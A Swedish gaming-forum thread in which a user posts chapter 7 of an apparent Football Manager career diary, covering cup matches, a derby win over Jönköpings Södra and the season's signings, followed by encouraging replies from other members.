 

Riktigt rolig rapport. Som en del skriver så är det nog många som läser men inte ger någon feedback. Guilty as charged. Det borde vi alla bli lite bättre på. Många rapporter här inne som är roliga att följa.

Din rapport lockar extra mycket då jag tänkt mig en liknande save med din kvalmotståndare Åtvidaberg!

Keep it up, vore kul att få se hela din resa!?


   
Micke reacted
SvaraCitera
(@jaggernut)
Active Member
Blev medlem: 2 år sedan
Inlägg: 12
Topic starter  

@micke @raca14 @jompaa11 @Skilltown

Fan, blev ju sugen på att uppdatera nu efter era svar. Tack för era fina ord!

Kommer en uppdatering ikväll eller imorgon.


   
Micke reacted
SvaraCitera
(@jaggernut)
Active Member
Blev medlem: 2 år sedan
Inlägg: 12
Topic starter  

Kapitel 7 - Rivalmöte och floppvärvning

Laget började ta form och var så gott som komplett. Jag kände mig riktigt nöjd med att ha plockat in spelare som höjt nivån i laget och som bör kunna bidra till ett mer stabilt spel. Utöver de värvningar ni kunde läsa i förra kapitlet hade jag även gjort klart med två spelare vi tidigare lånat in från Assyriska Turabdin - Mihad Jukovic och Erik Watson. Den förstnämnda som backup till yttermittfältspositionen. När vi värvade in honom gratis går han in som fjärdeval på yttermittfältet efter Traore, Kocadag och Inai. Erik Watson däremot kommer fightas om en plats i startelvan på innermittfältet bredvid Filip Ededal. Vi behöver en bra box-till-box mittfältare bredvid vår spelfördelare och just nu ser Watson starkast ut på den positionen.

 

Svenska Cupen

Säsongen drog igång med gruppspelet i Svenska Cupen där vi lottats mot Elfsborg, Örebro och våra bittra rivaler Jönköpings Södra. Vi inledde med en 0-2 förlust mot Elfsborg, enligt mitt tycke är resultatet inte helt rättvist. Vi skapade en hel del chanser och borde fått in minst ett mål. Matchen efter är det dags att möta J-Södra. På presskonferensen innan matchen hade Patrik Jildefalk snackat en del skit om oss och påstått att jag inte var speciellt kompetent som tränare. Jag var inte sen på att haka på och det blev ett ganska hetskt ordkrig inför matchen. Men jag älskar att piska upp stämningen för ett derby. Och det verkade som det gav resultat. Efter 60 minuter leder vi med hela 3-0 på J-Södras hemmaplan. Tyvärr slappnar grabbarna av sista tio och vi släpper in två skitmål, men vi vinner trots allt derbyt mot rivalerna som dessutom spelar en division högre än oss.
Otroligt skönt!

Sista matchen i gruppspelet möter vi Örebro och jag beslutar mig för att rotera hela laget. Vi behöver bli matchredo inför säsongen och i och med att Elfsborg vunnit sina två inledande matcher kändes det tufft att nå slutspelet. Vi fick stryk med 2-4 till slut.

 

Första halvan av säsongen

Efter ett antal träningsmatcher och Svenska Cupen kändes laget redo att sparka igång Division 1. Och som vi gjorde det! Endast en förlust på de fyra inledande matcherna.

Säsongen har sedan dess fortlöpt över förväntan med en del plumpar här och där, men efter 15 spelade matcher ligger vi på en femte plats, bara 6 poäng ifrån kvalplats! Hade aldrig kunnat tro att det skulle gå såhär bra.

Gällande nyförvärven så har de flesta verkligen presterat. Speciellt Lassine Traore som vi värvade från Österlen. Riktigt viktig spelare som skapar oreda hos motståndarna i varje match. Har växt till att bli en personlig favorit (säg inget till resten av truppen) men hans låga attribut gällande kondition gör att han sällan orkar prestera en hel match tyvärr. Här nedan ser ni hans snittbetyg och poängproduktion. Tycker han bidragit betydligt mer än vad statistiken visar.

Säsongens floppvärvning har helt klart varit Anton Henningsson. Killen som slog till med 18 fullträffar på 13 matcher förra säsongen i Division 2 har trots sitt godkända snittbetyg endast mäktat med tre mål och inte en enda assist på 14 matcher. 

 

Det var allt för denna uppdateringen. Tack för att ni läser trots min sviktande motivation! Ska försöka bättra mig.


   
Palst, raca14, Perisflow and 1 people reacted
SvaraCitera
(@skilltown)
Active Member
Blev medlem: 4 år sedan
Inlägg: 6
 

Härlig start! Får hoppas att Henningsson hittar formen!???


   
SvaraCitera
Lange95
(@lange95)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
 

Riktigt rolig rapport att följa! Vet att det är svårt att hitta motivation att skriva när man inte får direkt feedback. 

Hang in there!? 


   
SvaraCitera
Share: